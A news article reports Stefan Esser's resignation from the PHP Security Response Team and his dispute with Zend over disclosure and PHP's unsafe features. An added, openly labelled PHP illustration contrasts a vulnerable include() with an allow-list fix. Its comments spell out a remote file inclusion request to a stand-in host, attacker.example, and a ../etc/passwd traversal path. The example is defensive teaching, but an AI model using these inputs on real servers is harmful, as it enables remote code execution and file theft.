Security specialist leaves PHP security team
Stefan Esser, PHP security specialist and member of the official PHP Security Response Team, has, he says, had enough: in his blog he has announced his immediate resignation from the PHP Security Response Team. He gives various reasons for doing so, the most important being that his attempt to make PHP safer "from the inside" has proved futile. According to Esser, anyone who criticises PHP security becomes persona non grata in the security team. In addition, many of his suggestions were ignored because the developers considered his choice of words too abrasive. He says he has stopped counting the number of times he was called a traitor for publishing a bug report on a vulnerability in PHP.
Esser intends to continue publishing his reports without regard to whether or not a patch is available. He no longer wishes to cover up the slow reaction time between the discovery of a vulnerability and the publication of the information. It is reasonable to expect that he will publish substantially more PHP vulnerabilities in future.
The disagreement between Esser and the PHP team seems to be inflamed above all by the question of how best to improve the security of PHP. Esser feels that certain PHP features are intrinsically unsafe (for example the allow_url_fopen/allow_url_include configuration directives, which let fopen() and include() pull data or code from remote URLs) and should therefore be revised, whereas many developers, including PHP specialists Zend, think that the security problems in PHP applications have simply been caused by inexperienced programmers. Zeev Suraski, Zend's CTO, told heise Security that the majority of web applications are written in PHP; the sheer volume could give the impression that PHP is intrinsically unsafe.
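To make the technical point concrete, here is an added illustration (not code from the article, from Esser, or from the PHP project) of why allow_url_include is regarded as dangerous: the classic remote file inclusion pattern next to a hardened variant that maps the request parameter onto a fixed allow-list. The page names, the pages/ directory and the attacker host are hypothetical.

```php
<?php
// Added example, not from the article or the PHP project. Hypothetical
// application code showing how allow_url_include turns a user-controlled
// include() path into remote code execution, and how to harden it.

// --- Vulnerable form ------------------------------------------------------
// With allow_url_include=On (which also requires allow_url_fopen=On), a request
//   /index.php?page=http://attacker.example/shell.txt?
// makes include() fetch and execute attacker-controlled PHP; the trailing "?"
// turns the appended ".php" into a harmless query string.
// Even with URL inclusion disabled, the path is still fully user-controlled,
// so local file inclusion (../../../../etc/passwd) remains possible.
function render_page_vulnerable(array $get): void
{
    $page = $get['page'] ?? 'home';
    include $page . '.php';
}

// --- Hardened form --------------------------------------------------------
// Map the untrusted parameter onto a fixed allow-list of files; user input
// never becomes any part of the path handed to include().
const PAGES = [
    'home'    => 'pages/home.php',
    'about'   => 'pages/about.php',
    'contact' => 'pages/contact.php',
];

// Returns the allow-listed file for a requested page name, or null if the
// name is not known. Anything that is not an exact key (URLs, "../" paths,
// stream wrappers) falls through to null.
function resolve_page(string $requested): ?string
{
    return PAGES[$requested] ?? null;
}

function render_page_hardened(array $get): void
{
    $file = resolve_page((string)($get['page'] ?? 'home'));
    if ($file === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include __DIR__ . '/' . $file;
}

// Defence in depth: even with the allow-list in place, keep URL inclusion
// off so a future bug cannot reach out to a remote server. php.ini:
//   allow_url_fopen   = Off   ; if the application never needs remote streams
//   allow_url_include = Off   ; the default since the directive was introduced in PHP 5.2.0
// Both directives are PHP_INI_SYSTEM, so they cannot be changed at runtime;
// the check below only reports the effective setting.
function url_include_enabled(): bool
{
    return filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

if (PHP_SAPI === 'cli') {
    printf("allow_url_include is %s\n", url_include_enabled() ? 'ON (risky)' : 'off');
    var_dump(resolve_page('about'));
    var_dump(resolve_page('http://attacker.example/shell.txt?'));
}
```

The point of the allow-list is that the untrusted value is used only as a lookup key and never concatenated into a path, so the hardened function is safe regardless of how allow_url_fopen and allow_url_include happen to be set on the host.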
Suraski expressed his regret at Esser's resignation from the security team and hoped that Esser might reconsider and return. He also hoped that Esser would not turn against the PHP project; the "Month of PHP security bugs" that Esser has proposed for 2007 would harm it. Esser had in the past made a substantial contribution to improving the PHP implementation and making it more secure, even if there had been differences of opinion over methods. It is not the case, he said, that the PHP project is trying to conceal the fact that PHP has been implemented in a very unsafe way. Suraski does, however, think it preferable to produce a patch before publishing any bug report.
This approach is too slow for Esser. In his opinion too much time elapses between bug reports and bug fixes. By his observation only three people on the PHP security mailing list are actually fixing bugs. Furthermore, bugs were sometimes fixed incorrectly or later reintroduced, which often went unnoticed because there was no regression test suite for exploits, and the idea of having one was categorically rejected. Esser told heise Security: "At the very most it was permissible to deal with a bug in a test-rig which did not directly test for exploits".
He concedes that there are too many inexperienced programmers, but there are also far too many boundary conditions that have to be taken into account to keep an application secure. In his view it is also irresponsible to cease proper support for the PHP 4 branch. The current CVS version contains fixes for security vulnerabilities for which users have been waiting six months. Esser writes in his e-mail: "Plus, other vulnerabilities have been fixed for which either an advisory has not yet been published by a third party, or which were found and fixed by a PHP developer and for which, as ever in these cases, hardly any information has been released".
- http://blog.php-security.org/archives/61-Retired-from-securityphp.net.html, blog entry from Stefan Esser